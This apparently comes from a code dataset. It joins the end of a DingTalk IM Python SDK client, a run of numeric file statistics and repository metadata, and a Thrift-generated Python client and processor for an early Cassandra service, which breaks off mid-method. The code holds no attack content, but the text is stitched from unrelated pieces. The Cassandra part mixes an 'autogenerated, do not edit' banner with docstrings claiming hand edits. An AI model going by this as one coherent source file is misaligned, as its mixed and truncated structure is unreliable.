if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendRobotInteractiveCardResponse(),
self.do_roarequest('SendRobotInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/v1.0/robot/interactiveCards/send', 'json', req, runtime)
)
async def send_robot_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendRobotInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.request_id):
body['RequestId'] = request.request_id
if not UtilClient.is_unset(request.ding_access_token_type):
body['dingAccessTokenType'] = request.ding_access_token_type
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_open_app_id):
body['dingOpenAppId'] = request.ding_open_app_id
if not UtilClient.is_unset(request.ding_uid):
body['dingUid'] = request.ding_uid
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.card_biz_id):
body['cardBizId'] = request.card_biz_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendRobotInteractiveCardResponse(),
await self.do_roarequest_async('SendRobotInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/v1.0/robot/interactiveCards/send', 'json', req, runtime)
)
| 53.544108
| 175
| 0.705318
| 9,562
| 83,154
| 5.725267
| 0.027818
| 0.034158
| 0.102475
| 0.116138
| 0.985843
| 0.974208
| 0.966243
| 0.952361
| 0.937255
| 0.925601
| 0
| 0.008354
| 0.209659
| 83,154
| 1,552
| 176
| 53.578608
| 0.82465
| 0.000962
| 0
| 0.868598
| 1
| 0
| 0.083819
| 0.026944
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020889
| false
| 0
| 0.004717
| 0
| 0.066712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
378b3b41bcdf00909372c6a02716f537f007a4da
| 67,618
|
py
|
Python
|
interface/py/com/facebook/infrastructure/service/Cassandra.py
|
jiansheng/cassandra
|
3b4bac8e561f5a4c2e0873226cd50a5b6cad305c
|
[
"Apache-2.0"
] | 2
|
2015-11-25T10:42:06.000Z
|
2016-05-08T13:38:27.000Z
|
interface/py/com/facebook/infrastructure/service/Cassandra.py
|
jtrutna/cassandra
|
3b4bac8e561f5a4c2e0873226cd50a5b6cad305c
|
[
"Apache-2.0"
] | null | null | null |
interface/py/com/facebook/infrastructure/service/Cassandra.py
|
jtrutna/cassandra
|
3b4bac8e561f5a4c2e0873226cd50a5b6cad305c
|
[
"Apache-2.0"
] | 1
|
2019-05-02T22:02:54.000Z
|
2019-05-02T22:02:54.000Z
|
#
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from thrift.Thrift import *
import fb303.FacebookService
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
# The C-accelerated (de)serializer is optional; fall back to the pure-Python
# protocol when it is not built.  Catch only ImportError — the original bare
# `except:` would also have swallowed SystemExit/KeyboardInterrupt.
try:
    from thrift.protocol import fastbinary
except ImportError:
    fastbinary = None
class Iface(fb303.FacebookService.Iface):
    """Abstract interface of the Cassandra Thrift service.

    Autogenerated stub: every method body here is a no-op placeholder.
    A concrete handler implementing these methods is supplied to
    ``Processor``; ``Client`` provides the caller side.
    """
    # Column-level reads.
    def get_slice(self, tablename, key, columnFamily_column, start, count):
        pass
    def get_column(self, tablename, key, columnFamily_column):
        pass
    def get_column_count(self, tablename, key, columnFamily_column):
        pass
    # Writes; the *_blocking variants wait for a server reply.
    def insert_blocking(self, tablename, key, columnFamily_column, cellData, timestamp):
        pass
    def insert(self, tablename, key, columnFamily_column, cellData, timestamp):
        pass
    def batch_insert(self, batchMutation):
        pass
    def batch_insert_blocking(self, batchMutation):
        pass
    def remove(self, tablename, key, columnFamily_column):
        pass
    # Super-column variants.
    def get_slice_super(self, tablename, key, columnFamily_superColumnName, start, count):
        pass
    def get_superColumn(self, tablename, key, columnFamily):
        pass
    def batch_insert_superColumn(self, batchMutationSuper):
        pass
    def batch_insert_superColumn_blocking(self, batchMutationSuper):
        pass
class Client(fb303.FacebookService.Client, Iface):
    """Synchronous Thrift client for the Cassandra service.

    Each RPC is split into up to three methods:

    * ``foo``      -- public entry point: sends the arguments and, when the
                      call has a reply, waits for and returns the result.
    * ``send_foo`` -- serializes the argument struct onto the output
                      protocol and flushes the transport.
    * ``recv_foo`` -- reads the reply message, re-raising any
                      TApplicationException carried on the wire.

    Calls without a ``recv_`` method (insert, batch_insert, remove,
    batch_insert_superColumn) are fire-and-forget: they return as soon as
    the request has been flushed.
    """
    def __init__(self, iprot, oprot=None):
        # oprot defaults to iprot (handled by the fb303 base) for
        # bidirectional transports.
        fb303.FacebookService.Client.__init__(self, iprot, oprot)
    def get_slice(self, tablename, key, columnFamily_column, start, count):
        self.send_get_slice(tablename, key, columnFamily_column, start, count)
        return self.recv_get_slice()
    def send_get_slice(self, tablename, key, columnFamily_column, start, count):
        self._oprot.writeMessageBegin('get_slice', TMessageType.CALL, self._seqid)
        args = get_slice_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_column = columnFamily_column
        args.start = start
        args.count = count
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_slice(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = get_slice_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_slice failed: unknown result");
    def get_column(self, tablename, key, columnFamily_column):
        self.send_get_column(tablename, key, columnFamily_column)
        return self.recv_get_column()
    def send_get_column(self, tablename, key, columnFamily_column):
        self._oprot.writeMessageBegin('get_column', TMessageType.CALL, self._seqid)
        args = get_column_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_column = columnFamily_column
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_column(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = get_column_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_column failed: unknown result");
    def get_column_count(self, tablename, key, columnFamily_column):
        self.send_get_column_count(tablename, key, columnFamily_column)
        return self.recv_get_column_count()
    def send_get_column_count(self, tablename, key, columnFamily_column):
        self._oprot.writeMessageBegin('get_column_count', TMessageType.CALL, self._seqid)
        args = get_column_count_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_column = columnFamily_column
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_column_count(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = get_column_count_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_column_count failed: unknown result");
    def insert_blocking(self, tablename, key, columnFamily_column, cellData, timestamp):
        # Void-returning call: still waits for the reply (write acknowledged).
        self.send_insert_blocking(tablename, key, columnFamily_column, cellData, timestamp)
        self.recv_insert_blocking()
    def send_insert_blocking(self, tablename, key, columnFamily_column, cellData, timestamp):
        self._oprot.writeMessageBegin('insert_blocking', TMessageType.CALL, self._seqid)
        args = insert_blocking_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_column = columnFamily_column
        args.cellData = cellData
        args.timestamp = timestamp
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_insert_blocking(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = insert_blocking_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        return
    def insert(self, tablename, key, columnFamily_column, cellData, timestamp):
        # One-way: no recv_ counterpart, returns after flush.
        self.send_insert(tablename, key, columnFamily_column, cellData, timestamp)
    def send_insert(self, tablename, key, columnFamily_column, cellData, timestamp):
        self._oprot.writeMessageBegin('insert', TMessageType.CALL, self._seqid)
        args = insert_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_column = columnFamily_column
        args.cellData = cellData
        args.timestamp = timestamp
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def batch_insert(self, batchMutation):
        # One-way batch write.
        self.send_batch_insert(batchMutation)
    def send_batch_insert(self, batchMutation):
        self._oprot.writeMessageBegin('batch_insert', TMessageType.CALL, self._seqid)
        args = batch_insert_args()
        args.batchMutation = batchMutation
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def batch_insert_blocking(self, batchMutation):
        self.send_batch_insert_blocking(batchMutation)
        return self.recv_batch_insert_blocking()
    def send_batch_insert_blocking(self, batchMutation):
        self._oprot.writeMessageBegin('batch_insert_blocking', TMessageType.CALL, self._seqid)
        args = batch_insert_blocking_args()
        args.batchMutation = batchMutation
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_batch_insert_blocking(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = batch_insert_blocking_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "batch_insert_blocking failed: unknown result");
    def remove(self, tablename, key, columnFamily_column):
        # One-way delete.
        self.send_remove(tablename, key, columnFamily_column)
    def send_remove(self, tablename, key, columnFamily_column):
        self._oprot.writeMessageBegin('remove', TMessageType.CALL, self._seqid)
        args = remove_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_column = columnFamily_column
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def get_slice_super(self, tablename, key, columnFamily_superColumnName, start, count):
        self.send_get_slice_super(tablename, key, columnFamily_superColumnName, start, count)
        return self.recv_get_slice_super()
    def send_get_slice_super(self, tablename, key, columnFamily_superColumnName, start, count):
        self._oprot.writeMessageBegin('get_slice_super', TMessageType.CALL, self._seqid)
        args = get_slice_super_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily_superColumnName = columnFamily_superColumnName
        args.start = start
        args.count = count
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_slice_super(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = get_slice_super_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_slice_super failed: unknown result");
    def get_superColumn(self, tablename, key, columnFamily):
        self.send_get_superColumn(tablename, key, columnFamily)
        return self.recv_get_superColumn()
    def send_get_superColumn(self, tablename, key, columnFamily):
        self._oprot.writeMessageBegin('get_superColumn', TMessageType.CALL, self._seqid)
        args = get_superColumn_args()
        args.tablename = tablename
        args.key = key
        args.columnFamily = columnFamily
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_superColumn(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = get_superColumn_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_superColumn failed: unknown result");
    def batch_insert_superColumn(self, batchMutationSuper):
        # One-way super-column batch write.
        self.send_batch_insert_superColumn(batchMutationSuper)
    def send_batch_insert_superColumn(self, batchMutationSuper):
        self._oprot.writeMessageBegin('batch_insert_superColumn', TMessageType.CALL, self._seqid)
        args = batch_insert_superColumn_args()
        args.batchMutationSuper = batchMutationSuper
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def batch_insert_superColumn_blocking(self, batchMutationSuper):
        self.send_batch_insert_superColumn_blocking(batchMutationSuper)
        return self.recv_batch_insert_superColumn_blocking()
    def send_batch_insert_superColumn_blocking(self, batchMutationSuper):
        self._oprot.writeMessageBegin('batch_insert_superColumn_blocking', TMessageType.CALL, self._seqid)
        args = batch_insert_superColumn_blocking_args()
        args.batchMutationSuper = batchMutationSuper
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_batch_insert_superColumn_blocking(self, ):
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(self._iprot)
            self._iprot.readMessageEnd()
            raise x
        result = batch_insert_superColumn_blocking_result()
        result.read(self._iprot)
        self._iprot.readMessageEnd()
        if result.success != None:
            return result.success
        raise TApplicationException(TApplicationException.MISSING_RESULT, "batch_insert_superColumn_blocking failed: unknown result");
class Processor(fb303.FacebookService.Processor, Iface, TProcessor):
    """Server-side dispatcher for the Cassandra Thrift service.

    ``__init__`` registers one ``process_*`` entry per RPC in
    ``_processMap`` (keyed by wire method name).  ``process`` reads the
    next incoming message, looks up the handler by name, and either
    dispatches to it or replies with an UNKNOWN_METHOD exception.  Each
    ``process_*`` deserializes the argument struct, invokes the wrapped
    handler, and (for non-one-way calls) serializes the reply.
    """
    def __init__(self, handler):
        fb303.FacebookService.Processor.__init__(self, handler)
        self._processMap["get_slice"] = Processor.process_get_slice
        self._processMap["get_column"] = Processor.process_get_column
        self._processMap["get_column_count"] = Processor.process_get_column_count
        self._processMap["insert_blocking"] = Processor.process_insert_blocking
        self._processMap["insert"] = Processor.process_insert
        self._processMap["batch_insert"] = Processor.process_batch_insert
        self._processMap["batch_insert_blocking"] = Processor.process_batch_insert_blocking
        self._processMap["remove"] = Processor.process_remove
        self._processMap["get_slice_super"] = Processor.process_get_slice_super
        self._processMap["get_superColumn"] = Processor.process_get_superColumn
        self._processMap["batch_insert_superColumn"] = Processor.process_batch_insert_superColumn
        self._processMap["batch_insert_superColumn_blocking"] = Processor.process_batch_insert_superColumn_blocking
    def process(self, iprot, oprot):
        # Read one message and dispatch by method name; unknown names get an
        # EXCEPTION reply instead of killing the connection.
        (name, type, seqid) = iprot.readMessageBegin()
        if name not in self._processMap:
            iprot.skip(TType.STRUCT)
            iprot.readMessageEnd()
            x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
            oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
            x.write(oprot)
            oprot.writeMessageEnd()
            oprot.trans.flush()
            return
        else:
            self._processMap[name](self, seqid, iprot, oprot)
        return True
    def process_get_slice(self, seqid, iprot, oprot):
        args = get_slice_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_slice_result()
        result.success = self._handler.get_slice(args.tablename, args.key, args.columnFamily_column, args.start, args.count)
        oprot.writeMessageBegin("get_slice", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_get_column(self, seqid, iprot, oprot):
        args = get_column_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_column_result()
        result.success = self._handler.get_column(args.tablename, args.key, args.columnFamily_column)
        oprot.writeMessageBegin("get_column", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_get_column_count(self, seqid, iprot, oprot):
        args = get_column_count_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_column_count_result()
        result.success = self._handler.get_column_count(args.tablename, args.key, args.columnFamily_column)
        oprot.writeMessageBegin("get_column_count", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_insert_blocking(self, seqid, iprot, oprot):
        args = insert_blocking_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = insert_blocking_result()
        # Void RPC: the empty result struct is still written as the ack.
        self._handler.insert_blocking(args.tablename, args.key, args.columnFamily_column, args.cellData, args.timestamp)
        oprot.writeMessageBegin("insert_blocking", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_insert(self, seqid, iprot, oprot):
        # One-way: no reply is written.
        args = insert_args()
        args.read(iprot)
        iprot.readMessageEnd()
        self._handler.insert(args.tablename, args.key, args.columnFamily_column, args.cellData, args.timestamp)
        return
    def process_batch_insert(self, seqid, iprot, oprot):
        # One-way: no reply is written.
        args = batch_insert_args()
        args.read(iprot)
        iprot.readMessageEnd()
        self._handler.batch_insert(args.batchMutation)
        return
    def process_batch_insert_blocking(self, seqid, iprot, oprot):
        args = batch_insert_blocking_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = batch_insert_blocking_result()
        result.success = self._handler.batch_insert_blocking(args.batchMutation)
        oprot.writeMessageBegin("batch_insert_blocking", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_remove(self, seqid, iprot, oprot):
        # One-way: no reply is written.
        args = remove_args()
        args.read(iprot)
        iprot.readMessageEnd()
        self._handler.remove(args.tablename, args.key, args.columnFamily_column)
        return
    def process_get_slice_super(self, seqid, iprot, oprot):
        args = get_slice_super_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_slice_super_result()
        result.success = self._handler.get_slice_super(args.tablename, args.key, args.columnFamily_superColumnName, args.start, args.count)
        oprot.writeMessageBegin("get_slice_super", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_get_superColumn(self, seqid, iprot, oprot):
        args = get_superColumn_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_superColumn_result()
        result.success = self._handler.get_superColumn(args.tablename, args.key, args.columnFamily)
        oprot.writeMessageBegin("get_superColumn", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
    def process_batch_insert_superColumn(self, seqid, iprot, oprot):
        # One-way: no reply is written.
        args = batch_insert_superColumn_args()
        args.read(iprot)
        iprot.readMessageEnd()
        self._handler.batch_insert_superColumn(args.batchMutationSuper)
        return
    def process_batch_insert_superColumn_blocking(self, seqid, iprot, oprot):
        args = batch_insert_superColumn_blocking_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = batch_insert_superColumn_blocking_result()
        result.success = self._handler.batch_insert_superColumn_blocking(args.batchMutationSuper)
        oprot.writeMessageBegin("batch_insert_superColumn_blocking", TMessageType.REPLY, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class get_slice_args:
    """Argument struct for the ``get_slice`` RPC.

    Fields use negative Thrift ids (legacy implicit numbering).  ``start``
    and ``count`` default to -1; string fields default to None and are
    skipped on the wire when unset.  Idiom fixes vs. the generated code:
    ``is (not) None`` instead of ``== None``/``!= None`` and no trailing
    semicolons — wire behavior is unchanged.
    """
    thrift_spec = None
    def __init__(self, d=None):
        self.tablename = None
        self.key = None
        self.columnFamily_column = None
        self.start = -1
        self.count = -1
        # Optional dict initializer, as emitted by the Thrift generator.
        if isinstance(d, dict):
            if 'tablename' in d:
                self.tablename = d['tablename']
            if 'key' in d:
                self.key = d['key']
            if 'columnFamily_column' in d:
                self.columnFamily_column = d['columnFamily_column']
            if 'start' in d:
                self.start = d['start']
            if 'count' in d:
                self.count = d['count']
    def read(self, iprot):
        # C-accelerated fast path when the transport and spec allow it.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == -1:
                if ftype == TType.STRING:
                    self.tablename = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -2:
                if ftype == TType.STRING:
                    self.key = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -3:
                if ftype == TType.STRING:
                    self.columnFamily_column = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -4:
                if ftype == TType.I32:
                    self.start = iprot.readI32()
                else:
                    iprot.skip(ftype)
            elif fid == -5:
                if ftype == TType.I32:
                    self.count = iprot.readI32()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        # C-accelerated fast path when a spec is available.
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_slice_args')
        if self.tablename is not None:
            oprot.writeFieldBegin('tablename', TType.STRING, -1)
            oprot.writeString(self.tablename)
            oprot.writeFieldEnd()
        if self.key is not None:
            oprot.writeFieldBegin('key', TType.STRING, -2)
            oprot.writeString(self.key)
            oprot.writeFieldEnd()
        if self.columnFamily_column is not None:
            oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
            oprot.writeString(self.columnFamily_column)
            oprot.writeFieldEnd()
        if self.start is not None:
            oprot.writeFieldBegin('start', TType.I32, -4)
            oprot.writeI32(self.start)
            oprot.writeFieldEnd()
        if self.count is not None:
            oprot.writeFieldBegin('count', TType.I32, -5)
            oprot.writeI32(self.count)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return repr(self.__dict__)
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
class get_slice_result:
    """Result struct for the ``get_slice`` RPC.

    Field 0 (``success``) is a list of column_t structs.  Idiom fix vs.
    the generated code: ``is not None`` instead of ``!= None``; the
    ``xrange`` call is kept because this generated file targets Python 2.
    """
    thrift_spec = (
        (0, TType.LIST, 'success', (TType.STRUCT,(column_t, column_t.thrift_spec)), None, ), # 0
    )
    def __init__(self, d=None):
        self.success = None
        # Optional dict initializer, as emitted by the Thrift generator.
        if isinstance(d, dict):
            if 'success' in d:
                self.success = d['success']
    def read(self, iprot):
        # C-accelerated fast path when the transport and spec allow it.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype42, _size39) = iprot.readListBegin()
                    for _i43 in xrange(_size39):
                        _elem44 = column_t()
                        _elem44.read(iprot)
                        self.success.append(_elem44)
                    iprot.readListEnd()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        # C-accelerated fast path when a spec is available.
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_slice_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRUCT, len(self.success))
            for iter45 in self.success:
                iter45.write(oprot)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return repr(self.__dict__)
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
class get_column_args:
    """Argument struct for the ``get_column`` RPC.

    Fields use negative Thrift ids (legacy implicit numbering); all three
    are strings defaulting to None and skipped on the wire when unset.
    Idiom fixes vs. the generated code: ``is (not) None`` instead of
    ``!= None`` and no trailing semicolons — wire behavior is unchanged.
    """
    thrift_spec = None
    def __init__(self, d=None):
        self.tablename = None
        self.key = None
        self.columnFamily_column = None
        # Optional dict initializer, as emitted by the Thrift generator.
        if isinstance(d, dict):
            if 'tablename' in d:
                self.tablename = d['tablename']
            if 'key' in d:
                self.key = d['key']
            if 'columnFamily_column' in d:
                self.columnFamily_column = d['columnFamily_column']
    def read(self, iprot):
        # C-accelerated fast path when the transport and spec allow it.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == -1:
                if ftype == TType.STRING:
                    self.tablename = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -2:
                if ftype == TType.STRING:
                    self.key = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == -3:
                if ftype == TType.STRING:
                    self.columnFamily_column = iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        # C-accelerated fast path when a spec is available.
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_column_args')
        if self.tablename is not None:
            oprot.writeFieldBegin('tablename', TType.STRING, -1)
            oprot.writeString(self.tablename)
            oprot.writeFieldEnd()
        if self.key is not None:
            oprot.writeFieldBegin('key', TType.STRING, -2)
            oprot.writeString(self.key)
            oprot.writeFieldEnd()
        if self.columnFamily_column is not None:
            oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
            oprot.writeString(self.columnFamily_column)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return repr(self.__dict__)
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
class get_column_result:
    """Result struct for the ``get_column`` RPC.

    Field 0 (``success``) is a single column_t struct.  Idiom fix vs. the
    generated code: ``is not None`` instead of ``!= None`` — wire behavior
    is unchanged.
    """
    thrift_spec = (
        (0, TType.STRUCT, 'success', (column_t, column_t.thrift_spec), None, ), # 0
    )
    def __init__(self, d=None):
        self.success = None
        # Optional dict initializer, as emitted by the Thrift generator.
        if isinstance(d, dict):
            if 'success' in d:
                self.success = d['success']
    def read(self, iprot):
        # C-accelerated fast path when the transport and spec allow it.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
